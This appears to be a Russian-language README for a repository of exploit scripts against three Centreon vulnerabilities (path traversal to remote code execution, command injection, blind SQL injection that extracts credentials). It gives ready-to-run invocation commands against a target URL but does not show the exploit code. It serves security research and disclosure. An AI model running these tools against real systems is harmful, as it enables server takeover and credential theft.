
# Эксплойты Centreon для CVE-2026-2749, CVE-2026-2751 и CVE-2026-2750
Этот репозиторий содержит эксплойты для CVE-2026-2749, CVE-2026-2751 и CVE-2026-2750 в Centreon, эксплуатирующие уязвимости Path Traversal, SQL Injection и Command Injection.
Все версии до 25.10
24.10
24.04
Path Traversal до RCE — Произвольная запись файлов через path traversal в загрузке Open Tickets, приводящая к удалённому выполнению кода.
Использование:
$ python3 CVE-2026-2749/pathtraversal_rce.py --url http://target/centreon --cookie PHPSESSID --cmd "id"

Command Injection через CLAPI generatetraps — Инъекция OS-команд через passthru() в CLAPI generatetraps.
Использование:
$ python3 CVE-2026-2750/cmdi_rce.py --url http://target/centreon --cookie PHPSESSID --cmd "id"

Blind SQL Injection через ключи массивов — Blind SQL-инъекция через несанитизированные ключи массивов в Service Dependencies, позволяющая извлечение учётных данных.
Использование:
$ python3 CVE-2026-2751/sqli_dump.py --url http://target/centreon --cookie PHPSESSID

Этот инструмент предназначен только для образовательных и исследовательских целей. Используйте его только на системах, которыми вы владеете или на тестирование которых у вас есть явное разрешение. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этой программой.
QuimeraX Intelligence — это продвинутая платформа EASM и Cyber Threat Intelligence, специализирующаяся на выявлении критических уязвимостей в сложных системах. Платформа проактивно отслеживает, обнаруживает и оповещает клиентов об угрозах безопасности, обеспечивая прозрачность и быстрое реагирование на потенциальные риски. Клиенты получают немедленные уведомления и подробные отчёты, если их системы оказываются уязвимыми, что позволяет им принять защитные меры. узнать больше
Hakai Security — это компания в сфере кибербезопасности, основанная профессионалами в области безопасности и приверженная техническому совершенству. Мы предлагаем индивидуальные решения в области безопасности, включая продвинутое тестирование на проникновение, реалистичные Red Team-симуляции и практики безопасной разработки для проактивной защиты активов наших клиентов от evolving киберугроз.